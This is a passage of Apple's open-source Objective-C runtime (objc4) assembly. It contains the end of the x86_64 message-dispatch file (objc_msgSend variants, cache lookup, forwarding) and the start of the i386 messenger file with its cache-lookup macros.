jne 1f // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// wrap or miss
jb LCacheMiss_f // if (bucket->sel < 1) cache miss
// wrap
movq 8(%r10), %r10 // bucket->imp is really first bucket
jmp 2f
// Clone scanning loop to miss instead of hang when cache is corrupt.
// The slow path may detect any corruption and halt later.
1:
// loop
cmpq $$1, (%r10)
jbe 3f // if (bucket->sel <= 1) wrap or miss
addq $$16, %r10 // bucket++
2:
.if $0 != STRET && $0 != SUPER_STRET && $0 != SUPER2_STRET
cmpq (%r10), %a2 // if (bucket->sel != _cmd)
.else
cmpq (%r10), %a3 // if (bucket->sel != _cmd)
.endif
jne 1b // scan more
// CacheHit must always be preceded by a not-taken `jne` instruction
CacheHit $0 // call or return imp
3:
// double wrap or miss
jmp LCacheMiss_f
.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup classRegister, selectorRegister
//
// Takes: $0 = class to search (a1 or a2 or r10 ONLY)
// $1 = selector to search for (a2 or a3 ONLY)
// r11 = class to search
//
// On exit: imp in %r11
//
/////////////////////////////////////////////////////////////////////
.macro MethodTableLookup
MESSENGER_END_SLOW
SaveRegisters
// _class_lookupMethodAndLoadCache3(receiver, selector, class)
movq $0, %a1
movq $1, %a2
movq %r11, %a3
call __class_lookupMethodAndLoadCache3
// IMP is now in %rax
movq %rax, %r11
RestoreRegisters
.endmacro
/////////////////////////////////////////////////////////////////////
//
// GetIsaCheckNil return-type
// GetIsaSupport return-type
//
// Sets r11 = receiver->isa.
// Looks up the real class if receiver is a tagged pointer object.
// Returns zero if obj is nil.
//
// Takes: $0 = NORMAL or FPRET or FP2RET or STRET
// a1 or a2 (STRET) = receiver
//
// On exit: r11 = receiver->isa
// r10 is clobbered
//
/////////////////////////////////////////////////////////////////////
.macro GetIsaCheckNil
.if $0 == SUPER || $0 == SUPER_STRET
error super dispatch does not test for nil
.endif
.if $0 != STRET
testq %a1, %a1
.else
testq %a2, %a2
.endif
jle LNilOrTagged_f // MSB tagged pointer looks negative
.if $0 != STRET
movq (%a1), %r11 // r11 = isa
.else
movq (%a2), %r11 // r11 = isa
.endif
LGetIsaDone:
.endmacro
.macro GetIsaSupport
.align 3
LNilOrTagged:
jz LNil_f // flags set by NilOrTaggedTest
// tagged
leaq _objc_debug_taggedpointer_classes(%rip), %r11
.if $0 != STRET
movq %a1, %r10
.else
movq %a2, %r10
.endif
shrq $$60, %r10
movq (%r11, %r10, 8), %r11 // read isa from table
jmp LGetIsaDone_b
LNil:
// nil
.if $0 == FPRET
fldz
.elseif $0 == FP2RET
fldz
fldz
.endif
.if $0 == STRET
movq %rdi, %rax
.else
xorl %eax, %eax
xorl %edx, %edx
xorps %xmm0, %xmm0
xorps %xmm1, %xmm1
.endif
MESSENGER_END_NIL
ret
.endmacro
/********************************************************************
* IMP cache_getImp(Class cls, SEL sel)
*
* On entry: a1 = class whose cache is to be searched
* a2 = selector to search for
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
STATIC_ENTRY _cache_getImp
// do lookup
movq %a1, %r11 // move class to r11 for CacheLookup
CacheLookup GETIMP // returns IMP on success
LCacheMiss:
// cache miss, return nil
xorl %eax, %eax
ret
LGetImpExit:
END_ENTRY _cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
.data
.align 3
.globl _objc_debug_taggedpointer_classes
_objc_debug_taggedpointer_classes:
.fill 16, 8, 0
ENTRY _objc_msgSend
MESSENGER_START
GetIsaCheckNil NORMAL // r11 = self->isa, or return zero
CacheLookup NORMAL // calls IMP on success
GetIsaSupport NORMAL
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend
ENTRY _objc_msgSend_fixup
int3
END_ENTRY _objc_msgSend_fixup
STATIC_ENTRY _objc_msgSend_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend
END_ENTRY _objc_msgSend_fixedup
/********************************************************************
*
* id objc_msgSendSuper(struct objc_super *super, SEL _cmd,...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
********************************************************************/
ENTRY _objc_msgSendSuper
MESSENGER_START
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // class = objc_super->class
CacheLookup SUPER // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper
/********************************************************************
* id objc_msgSendSuper2
********************************************************************/
ENTRY _objc_msgSendSuper2
MESSENGER_START
// objc_super->class is superclass of class to search
// search the cache (objc_super in %a1)
movq class(%a1), %r11 // cls = objc_super->class
movq 8(%r11), %r11 // cls = class->superclass
CacheLookup SUPER2 // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a1), %r10
MethodTableLookup %r10, %a2 // r11 = IMP
movq receiver(%a1), %a1 // load real receiver
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2
ENTRY _objc_msgSendSuper2_fixup
int3
END_ENTRY _objc_msgSendSuper2_fixup
STATIC_ENTRY _objc_msgSendSuper2_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_fixedup
/********************************************************************
*
* double objc_msgSend_fpret(id self, SEL _cmd,...);
* Used for `long double` return only. `float` and `double` use objc_msgSend.
*
********************************************************************/
ENTRY _objc_msgSend_fpret
MESSENGER_START
GetIsaCheckNil FPRET // r11 = self->isa, or return zero
CacheLookup FPRET // calls IMP on success
GetIsaSupport FPRET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fpret
ENTRY _objc_msgSend_fpret_fixup
int3
END_ENTRY _objc_msgSend_fpret_fixup
STATIC_ENTRY _objc_msgSend_fpret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_fixedup
/********************************************************************
*
* double objc_msgSend_fp2ret(id self, SEL _cmd,...);
* Used for `complex long double` return only.
*
********************************************************************/
ENTRY _objc_msgSend_fp2ret
MESSENGER_START
GetIsaCheckNil FP2RET // r11 = self->isa, or return zero
CacheLookup FP2RET // calls IMP on success
GetIsaSupport FP2RET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_fp2ret
ENTRY _objc_msgSend_fp2ret_fixup
int3
END_ENTRY _objc_msgSend_fp2ret_fixup
STATIC_ENTRY _objc_msgSend_fp2ret_fixedup
// Load _cmd from the message_ref
movq 8(%a2), %a2
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_fixedup
/********************************************************************
*
* void objc_msgSend_stret(void *st_addr, id self, SEL _cmd, ...);
*
* objc_msgSend_stret is the struct-return form of msgSend.
* The ABI calls for %a1 to be used as the address of the structure
* being returned, with the parameters in the succeeding locations.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the message receiver,
* %a3 is the selector
********************************************************************/
ENTRY _objc_msgSend_stret
MESSENGER_START
GetIsaCheckNil STRET // r11 = self->isa, or return zero
CacheLookup STRET // calls IMP on success
GetIsaSupport STRET
// cache miss: go search the method lists
LCacheMiss:
// isa still in r11
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSend_stret
ENTRY _objc_msgSend_stret_fixup
int3
END_ENTRY _objc_msgSend_stret_fixup
STATIC_ENTRY _objc_msgSend_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_fixedup
/********************************************************************
*
* void objc_msgSendSuper_stret(void *st_addr, struct objc_super *super, SEL _cmd, ...);
*
* struct objc_super {
* id receiver;
* Class class;
* };
*
* objc_msgSendSuper_stret is the struct-return form of msgSendSuper.
* The ABI calls for (sp+4) to be used as the address of the structure
* being returned, with the parameters in the succeeding registers.
*
* On entry: %a1 is the address where the structure is returned,
* %a2 is the address of the objc_super structure,
* %a3 is the selector
*
********************************************************************/
ENTRY _objc_msgSendSuper_stret
MESSENGER_START
// search the cache (objc_super in %a2)
movq class(%a2), %r11 // class = objc_super->class
CacheLookup SUPER_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// class still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper_stret
/********************************************************************
* id objc_msgSendSuper2_stret
********************************************************************/
ENTRY _objc_msgSendSuper2_stret
MESSENGER_START
// search the cache (objc_super in %a2)
movq class(%a2), %r11 // class = objc_super->class
movq 8(%r11), %r11 // class = class->superclass
CacheLookup SUPER2_STRET // calls IMP on success
// cache miss: go search the method lists
LCacheMiss:
// superclass still in r11
movq receiver(%a2), %r10
MethodTableLookup %r10, %a3 // r11 = IMP
movq receiver(%a2), %a2 // load real receiver
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY _objc_msgSendSuper2_stret
ENTRY _objc_msgSendSuper2_stret_fixup
int3
END_ENTRY _objc_msgSendSuper2_stret_fixup
STATIC_ENTRY _objc_msgSendSuper2_stret_fixedup
// Load _cmd from the message_ref
movq 8(%a3), %a3
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_fixedup
/********************************************************************
*
* _objc_msgSend_uncached_impcache
* _objc_msgSend_uncached
* _objc_msgSend_stret_uncached
*
* Used to erase method cache entries in-place by
* bouncing them to the uncached lookup.
*
********************************************************************/
STATIC_ENTRY __objc_msgSend_uncached_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
// Out-of-band r11 is the searched class
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgSend_stret_uncached
jmp __objc_msgSend_uncached
END_ENTRY __objc_msgSend_uncached_impcache
STATIC_ENTRY __objc_msgSend_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
MethodTableLookup %a1, %a2 // r11 = IMP
cmp %r11, %r11 // set eq (nonstret) for forwarding
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_uncached
STATIC_ENTRY __objc_msgSend_stret_uncached
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band r11 is the searched class
// r11 is already the class to search
MethodTableLookup %a2, %a3 // r11 = IMP
test %r11, %r11 // set ne (stret) for forward; r11!=0
jmp *%r11 // goto *imp
END_ENTRY __objc_msgSend_stret_uncached
/********************************************************************
*
* id _objc_msgForward(id self, SEL _cmd,...);
*
* _objc_msgForward and _objc_msgForward_stret are the externally-callable
* functions returned by things like method_getImplementation().
* _objc_msgForward_impcache is the function pointer actually stored in
* method caches.
*
********************************************************************/
STATIC_ENTRY __objc_msgForward_impcache
// Method cache version
// THIS IS NOT A CALLABLE C FUNCTION
// Out-of-band condition register is NE for stret, EQ otherwise.
MESSENGER_START
nop
MESSENGER_END_SLOW
jne __objc_msgForward_stret
jmp __objc_msgForward
END_ENTRY __objc_msgForward_impcache
ENTRY __objc_msgForward
// Non-stret version
movq __objc_forward_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward
ENTRY __objc_msgForward_stret
// Struct-return version
movq __objc_forward_stret_handler(%rip), %r11
jmp *%r11
END_ENTRY __objc_msgForward_stret
ENTRY _objc_msgSend_debug
jmp _objc_msgSend
END_ENTRY _objc_msgSend_debug
ENTRY _objc_msgSendSuper2_debug
jmp _objc_msgSendSuper2
END_ENTRY _objc_msgSendSuper2_debug
ENTRY _objc_msgSend_stret_debug
jmp _objc_msgSend_stret
END_ENTRY _objc_msgSend_stret_debug
ENTRY _objc_msgSendSuper2_stret_debug
jmp _objc_msgSendSuper2_stret
END_ENTRY _objc_msgSendSuper2_stret_debug
ENTRY _objc_msgSend_fpret_debug
jmp _objc_msgSend_fpret
END_ENTRY _objc_msgSend_fpret_debug
ENTRY _objc_msgSend_fp2ret_debug
jmp _objc_msgSend_fp2ret
END_ENTRY _objc_msgSend_fp2ret_debug
ENTRY _objc_msgSend_noarg
jmp _objc_msgSend
END_ENTRY _objc_msgSend_noarg
ENTRY _method_invoke
movq method_imp(%a2), %r11
movq method_name(%a2), %a2
jmp *%r11
END_ENTRY _method_invoke
ENTRY _method_invoke_stret
movq method_imp(%a3), %r11
movq method_name(%a3), %a3
jmp *%r11
END_ENTRY _method_invoke_stret
STATIC_ENTRY __objc_ignored_method
movq %a1, %rax
ret
END_ENTRY __objc_ignored_method
.section __DATA,__objc_msg_break
.quad 0
.quad 0
#endif
|
opensource-apple/objc4 | 32,883 | runtime/Messengers.subproj/objc-msg-i386.s | /*
* Copyright (c) 1999-2007 Apple Inc. All Rights Reserved.
*
* @APPLE_LICENSE_HEADER_START@
*
* This file contains Original Code and/or Modifications of Original Code
* as defined in and that are subject to the Apple Public Source License
* Version 2.0 (the 'License'). You may not use this file except in
* compliance with the License. Please obtain a copy of the License at
* http://www.opensource.apple.com/apsl/ and read it before using this
* file.
*
* The Original Code and all software distributed under the License are
* distributed on an 'AS IS' basis, WITHOUT WARRANTY OF ANY KIND, EITHER
* EXPRESS OR IMPLIED, AND APPLE HEREBY DISCLAIMS ALL SUCH WARRANTIES,
* INCLUDING WITHOUT LIMITATION, ANY WARRANTIES OF MERCHANTABILITY,
* FITNESS FOR A PARTICULAR PURPOSE, QUIET ENJOYMENT OR NON-INFRINGEMENT.
* Please see the License for the specific language governing rights and
* limitations under the License.
*
* @APPLE_LICENSE_HEADER_END@
*/
#include <TargetConditionals.h>
#if defined(__i386__) && !TARGET_IPHONE_SIMULATOR
/********************************************************************
********************************************************************
**
** objc-msg-i386.s - i386 code to support objc messaging.
**
********************************************************************
********************************************************************/
// for kIgnore
#include "objc-config.h"
/********************************************************************
* Data used by the ObjC runtime.
*
********************************************************************/
.data
// _objc_entryPoints and _objc_exitPoints are used by objc
// to get the critical regions for which method caches
// cannot be garbage collected.
.align 2
.private_extern _objc_entryPoints
_objc_entryPoints:
.long __cache_getImp
.long __cache_getMethod
.long _objc_msgSend
.long _objc_msgSend_fpret
.long _objc_msgSend_stret
.long _objc_msgSendSuper
.long _objc_msgSendSuper_stret
.long 0
.private_extern _objc_exitPoints
_objc_exitPoints:
.long LGetImpExit
.long LGetMethodExit
.long LMsgSendExit
.long LMsgSendFpretExit
.long LMsgSendStretExit
.long LMsgSendSuperExit
.long LMsgSendSuperStretExit
.long 0
/********************************************************************
* List every exit insn from every messenger for debugger use.
* Format:
* (
* 1 word instruction's address
* 1 word type (ENTER or FAST_EXIT or SLOW_EXIT or NIL_EXIT)
* )
* 1 word zero
*
* ENTER is the start of a dispatcher
* FAST_EXIT is method dispatch
* SLOW_EXIT is uncached method lookup
* NIL_EXIT is returning zero from a message sent to nil
* These must match objc-gdb.h.
********************************************************************/
#define ENTER 1
#define FAST_EXIT 2
#define SLOW_EXIT 3
#define NIL_EXIT 4
.section __DATA,__objc_msg_break
.globl _gdb_objc_messenger_breakpoints
_gdb_objc_messenger_breakpoints:
// contents populated by the macros below
.macro MESSENGER_START
4:
.section __DATA,__objc_msg_break
.long 4b
.long ENTER
.text
.endmacro
.macro MESSENGER_END_FAST
4:
.section __DATA,__objc_msg_break
.long 4b
.long FAST_EXIT
.text
.endmacro
.macro MESSENGER_END_SLOW
4:
.section __DATA,__objc_msg_break
.long 4b
.long SLOW_EXIT
.text
.endmacro
.macro MESSENGER_END_NIL
4:
.section __DATA,__objc_msg_break
.long 4b
.long NIL_EXIT
.text
.endmacro
/********************************************************************
*
* Common offsets.
*
********************************************************************/
self = 4
super = 4
selector = 8
marg_size = 12
marg_list = 16
first_arg = 12
struct_addr = 4
self_stret = 8
super_stret = 8
selector_stret = 12
marg_size_stret = 16
marg_list_stret = 20
/********************************************************************
*
* Structure definitions.
*
********************************************************************/
// objc_super parameter to sendSuper
receiver = 0
class = 4
// Selected field offsets in class structure
isa = 0
cache = 32
// Method descriptor
method_name = 0
method_imp = 8
// Cache header
mask = 0
occupied = 4
buckets = 8 // variable length array
#if defined(OBJC_INSTRUMENTED)
// Cache instrumentation data, follows buckets
hitCount = 0
hitProbes = hitCount + 4
maxHitProbes = hitProbes + 4
missCount = maxHitProbes + 4
missProbes = missCount + 4
maxMissProbes = missProbes + 4
flushCount = maxMissProbes + 4
flushedEntries = flushCount + 4
// Buckets in CacheHitHistogram and CacheMissHistogram
CACHE_HISTOGRAM_SIZE = 512
#endif
//////////////////////////////////////////////////////////////////////
//
// ENTRY functionName
//
// Assembly directives to begin an exported function.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro ENTRY
.text
.globl $0
.align 4, 0x90
$0:
.endmacro
.macro STATIC_ENTRY
.text
.private_extern $0
.align 4, 0x90
$0:
.endmacro
//////////////////////////////////////////////////////////////////////
//
// END_ENTRY functionName
//
// Assembly directives to end an exported function. Just a placeholder,
// a close-parenthesis for ENTRY, until it is needed for something.
//
// Takes: functionName - name of the exported function
//////////////////////////////////////////////////////////////////////
.macro END_ENTRY
.endmacro
//////////////////////////////////////////////////////////////////////
//
// CALL_MCOUNTER
//
// Calls mcount() profiling routine. Must be called immediately on
// function entry, before any prologue executes.
//
//////////////////////////////////////////////////////////////////////
.macro CALL_MCOUNTER
#ifdef PROFILE
// Current stack contents: ret
pushl %ebp
movl %esp,%ebp
subl $$8,%esp
// Current stack contents: ret, ebp, pad, pad
call mcount
movl %ebp,%esp
popl %ebp
#endif
.endmacro
/////////////////////////////////////////////////////////////////////
//
//
// CacheLookup WORD_RETURN | STRUCT_RETURN, MSG_SEND | MSG_SENDSUPER | CACHE_GET, cacheMissLabel
//
// Locate the implementation for a selector in a class method cache.
//
// Takes: WORD_RETURN (first parameter is at sp+4)
// STRUCT_RETURN (struct address is at sp+4, first parameter at sp+8)
// MSG_SEND (first parameter is receiver)
// MSG_SENDSUPER (first parameter is address of objc_super structure)
// CACHE_GET (first parameter is class; return method triplet)
// selector in %ecx
// class to search in %edx
//
// cacheMissLabel = label to branch to iff method is not cached
//
// On exit: (found) MSG_SEND and MSG_SENDSUPER: return imp in eax
// (found) CACHE_GET: return method triplet in eax
// (not found) jumps to cacheMissLabel
//
/////////////////////////////////////////////////////////////////////
// Values to specify to method lookup macros whether the return type of
// the method is word or structure.
WORD_RETURN = 0
STRUCT_RETURN = 1
// Values to specify to method lookup macros whether the first argument
// is an object/class reference or a 'objc_super' structure.
MSG_SEND = 0 // first argument is receiver, search the isa
MSG_SENDSUPER = 1 // first argument is objc_super, search the class
CACHE_GET = 2 // first argument is class, search that class
.macro CacheLookup
// load variables and save caller registers.
pushl %edi // save scratch register
movl cache(%edx), %edi // cache = class->cache
pushl %esi // save scratch register
#if defined(OBJC_INSTRUMENTED)
pushl %ebx // save non-volatile register
pushl %eax // save cache pointer
xorl %ebx, %ebx // probeCount = 0
#endif
movl mask(%edi), %esi // mask = cache->mask
movl %ecx, %edx // index = selector
shrl $$2, %edx // index = selector >> 2
// search the receiver's cache
// ecx = selector
// edi = cache
// esi = mask
// edx = index
// eax = method (soon)
LMsgSendProbeCache_$0_$1_$2:
#if defined(OBJC_INSTRUMENTED)
addl $$1, %ebx // probeCount += 1
#endif
andl %esi, %edx // index &= mask
movl buckets(%edi, %edx, 4), %eax // meth = cache->buckets[index]
testl %eax, %eax // check for end of bucket
je LMsgSendCacheMiss_$0_$1_$2 // go to cache miss code
cmpl method_name(%eax), %ecx // check for method name match
je LMsgSendCacheHit_$0_$1_$2 // go handle cache hit
addl $$1, %edx // bump index ...
jmp LMsgSendProbeCache_$0_$1_$2 // ... and loop
// not found in cache: restore state and go to callers handler
LMsgSendCacheMiss_$0_$1_$2:
#if defined(OBJC_INSTRUMENTED)
popl %edx // retrieve cache pointer
movl mask(%edx), %esi // mask = cache->mask
testl %esi, %esi // a mask of zero is only for the...
je LMsgSendMissInstrumentDone_$0_$1_$2 // ... emptyCache, do not record anything
// locate and update the CacheInstrumentation structure
addl $$1, %esi // entryCount = mask + 1
shll $$2, %esi // tableSize = entryCount * sizeof(entry)
addl $buckets, %esi // offset = buckets + tableSize
addl %edx, %esi // cacheData = &cache->buckets[mask+1]
movl missCount(%esi), %edi //
addl $$1, %edi //
movl %edi, missCount(%esi) // cacheData->missCount += 1
movl missProbes(%esi), %edi //
addl %ebx, %edi //
movl %edi, missProbes(%esi) // cacheData->missProbes += probeCount
movl maxMissProbes(%esi), %edi// if (cacheData->maxMissProbes < probeCount)
cmpl %ebx, %edi //
jge LMsgSendMaxMissProbeOK_$0_$1_$2 //
movl %ebx, maxMissProbes(%esi)// cacheData->maxMissProbes = probeCount
LMsgSendMaxMissProbeOK_$0_$1_$2:
// update cache miss probe histogram
cmpl $CACHE_HISTOGRAM_SIZE, %ebx // pin probeCount to max index
jl LMsgSendMissHistoIndexSet_$0_$1_$2
movl $(CACHE_HISTOGRAM_SIZE-1), %ebx
LMsgSendMissHistoIndexSet_$0_$1_$2:
LEA_STATIC_DATA %esi, _CacheMissHistogram, EXTERNAL_SYMBOL
shll $$2, %ebx // convert probeCount to histogram index
addl %ebx, %esi // calculate &CacheMissHistogram[probeCount<<2]
movl 0(%esi), %edi // get current tally
addl $$1, %edi //
movl %edi, 0(%esi) // tally += 1
LMsgSendMissInstrumentDone_$0_$1_$2:
popl %ebx // restore non-volatile register
#endif
.if $0 == WORD_RETURN // Regular word return
.if $1 == MSG_SEND // MSG_SEND
popl %esi // restore callers register
popl %edi // restore callers register
movl self(%esp), %edx // get messaged object
movl isa(%edx), %eax // get objects class
.elseif $1 == MSG_SENDSUPER // MSG_SENDSUPER
// replace "super" arg with "receiver"
movl super+8(%esp), %edi // get super structure
movl receiver(%edi), %edx // get messaged object
movl %edx, super+8(%esp) // make it the first argument
movl class(%edi), %eax // get messaged class
popl %esi // restore callers register
popl %edi // restore callers register
.else // CACHE_GET
popl %esi // restore callers register
popl %edi // restore callers register
.endif
.else // Struct return
.if $1 == MSG_SEND // MSG_SEND (stret)
popl %esi // restore callers register
popl %edi // restore callers register
movl self_stret(%esp), %edx // get messaged object
movl isa(%edx), %eax // get objects class
.elseif $1 == MSG_SENDSUPER // MSG_SENDSUPER (stret)
// replace "super" arg with "receiver"
movl super_stret+8(%esp), %edi// get super structure
movl receiver(%edi), %edx // get messaged object
movl %edx, super_stret+8(%esp)// make it the first argument
movl class(%edi), %eax // get messaged class
popl %esi // restore callers register
popl %edi // restore callers register
.else // CACHE_GET
!! This should not happen.
.endif
.endif
// edx = receiver
// ecx = selector
// eax = class
jmp $2 // go to callers handler
// eax points to matching cache entry
.align 4, 0x90
LMsgSendCacheHit_$0_$1_$2:
#if defined(OBJC_INSTRUMENTED)
popl %edx // retrieve cache pointer
movl mask(%edx), %esi // mask = cache->mask
testl %esi, %esi // a mask of zero is only for the...
je LMsgSendHitInstrumentDone_$0_$1_$2 // ... emptyCache, do not record anything
// locate and update the CacheInstrumentation structure
addl $$1, %esi // entryCount = mask + 1
shll $$2, %esi // tableSize = entryCount * sizeof(entry)
addl $buckets, %esi // offset = buckets + tableSize
addl %edx, %esi // cacheData = &cache->buckets[mask+1]
movl hitCount(%esi), %edi
addl $$1, %edi
movl %edi, hitCount(%esi) // cacheData->hitCount += 1
movl hitProbes(%esi), %edi
addl %ebx, %edi
movl %edi, hitProbes(%esi) // cacheData->hitProbes += probeCount
movl maxHitProbes(%esi), %edi// if (cacheData->maxHitProbes < probeCount)
cmpl %ebx, %edi
jge LMsgSendMaxHitProbeOK_$0_$1_$2
movl %ebx, maxHitProbes(%esi)// cacheData->maxHitProbes = probeCount
LMsgSendMaxHitProbeOK_$0_$1_$2:
// update cache hit probe histogram
cmpl $CACHE_HISTOGRAM_SIZE, %ebx // pin probeCount to max index
jl LMsgSendHitHistoIndexSet_$0_$1_$2
movl $(CACHE_HISTOGRAM_SIZE-1), %ebx
LMsgSendHitHistoIndexSet_$0_$1_$2:
LEA_STATIC_DATA %esi, _CacheHitHistogram, EXTERNAL_SYMBOL
shll $$2, %ebx // convert probeCount to histogram index
addl %ebx, %esi // calculate &CacheHitHistogram[probeCount<<2]
movl 0(%esi), %edi // get current tally
addl $$1, %edi //
movl %edi, 0(%esi) // tally += 1
LMsgSendHitInstrumentDone_$0_$1_$2:
popl %ebx // restore non-volatile register
#endif
// load implementation address, restore state, and we're done
.if $1 == CACHE_GET
// method triplet is already in eax
.else
movl method_imp(%eax), %eax // imp = method->method_imp
.endif
.if $0 == WORD_RETURN // Regular word return
.if $1 == MSG_SENDSUPER // MSG_SENDSUPER
// replace "super" arg with "self"
movl super+8(%esp), %edi
movl receiver(%edi), %esi
movl %esi, super+8(%esp)
.endif
.else // Struct return
.if $1 == MSG_SENDSUPER // MSG_SENDSUPER (stret)
// replace "super" arg with "self"
movl super_stret+8(%esp), %edi
movl receiver(%edi), %esi
movl %esi, super_stret+8(%esp)
.endif
.endif
// restore caller registers
popl %esi
popl %edi
.endmacro
/////////////////////////////////////////////////////////////////////
//
// MethodTableLookup WORD_RETURN | STRUCT_RETURN, MSG_SEND | MSG_SENDSUPER
//
// Takes: WORD_RETURN (first parameter is at sp+4)
// STRUCT_RETURN (struct address is at sp+4, first parameter at sp+8)
// MSG_SEND (first parameter is receiver)
// MSG_SENDSUPER (first parameter is address of objc_super structure)
//
// edx = receiver
// ecx = selector
// eax = class
// (all set by CacheLookup's miss case)
//
// Stack must be at 0xXXXXXXXc on entrance.
//
// On exit: esp unchanged
// imp in eax
//
/////////////////////////////////////////////////////////////////////
.macro MethodTableLookup
MESSENGER_END_SLOW
// stack has return address and nothing else
subl $$(12+5*16), %esp
movdqa %xmm3, 4*16(%esp)
movdqa %xmm2, 3*16(%esp)
movdqa %xmm1, 2*16(%esp)
movdqa %xmm0, 1*16(%esp)
movl %eax, 8(%esp) // class
movl %ecx, 4(%esp) // selector
movl %edx, 0(%esp) // receiver
call __class_lookupMethodAndLoadCache3
movdqa 4*16(%esp), %xmm3
movdqa 3*16(%esp), %xmm2
movdqa 2*16(%esp), %xmm1
movdqa 1*16(%esp), %xmm0
addl $$(12+5*16), %esp // pop parameters
.endmacro
/********************************************************************
* Method _cache_getMethod(Class cls, SEL sel, IMP msgForward_internal_imp)
*
* If found, returns method triplet pointer.
* If not found, returns NULL.
*
* NOTE: _cache_getMethod never returns any cache entry whose implementation
* is _objc_msgForward_impcache. It returns 1 instead. This prevents thread-
* safety and memory management bugs in _class_lookupMethodAndLoadCache.
* See _class_lookupMethodAndLoadCache for details.
*
* _objc_msgForward_impcache is passed as a parameter because it's more
* efficient to do the (PIC) lookup once in the caller than repeatedly here.
********************************************************************/
STATIC_ENTRY __cache_getMethod
// load the class and selector
movl selector(%esp), %ecx
movl self(%esp), %edx
// do lookup
CacheLookup WORD_RETURN, CACHE_GET, LGetMethodMiss
// cache hit, method triplet in %eax
movl first_arg(%esp), %ecx // check for _objc_msgForward_impcache
cmpl method_imp(%eax), %ecx // if (imp==_objc_msgForward_impcache)
je 1f // return (Method)1
ret // else return method triplet address
1: movl $1, %eax
ret
LGetMethodMiss:
// cache miss, return nil
xorl %eax, %eax // zero %eax
ret
LGetMethodExit:
END_ENTRY __cache_getMethod
/********************************************************************
* IMP _cache_getImp(Class cls, SEL sel)
*
* If found, returns method implementation.
* If not found, returns NULL.
********************************************************************/
STATIC_ENTRY __cache_getImp
// load the class and selector
movl selector(%esp), %ecx
movl self(%esp), %edx
// do lookup
CacheLookup WORD_RETURN, CACHE_GET, LGetImpMiss
// cache hit, method triplet in %eax
movl method_imp(%eax), %eax // return method imp
ret
LGetImpMiss:
// cache miss, return nil
xorl %eax, %eax // zero %eax
ret
LGetImpExit:
END_ENTRY __cache_getImp
/********************************************************************
*
* id objc_msgSend(id self, SEL _cmd,...);
*
********************************************************************/
ENTRY _objc_msgSend
MESSENGER_START
CALL_MCOUNTER
// load receiver and selector
movl selector(%esp), %ecx
movl self(%esp), %eax
// check whether selector is ignored
cmpl $ kIgnore, %ecx
je LMsgSendDone // return self from %eax
// check whether receiver is nil
testl %eax, %eax
je LMsgSendNilSelf
// receiver (in %eax) is non-nil: search the cache
LMsgSendReceiverOk:
movl isa(%eax), %edx // class = self->isa
CacheLookup WORD_RETURN, MSG_SEND, LMsgSendCacheMiss
xor %edx, %edx // set nonstret for msgForward_internal
MESSENGER_END_FAST
jmp *%eax
// cache miss: go search the method lists
LMsgSendCacheMiss:
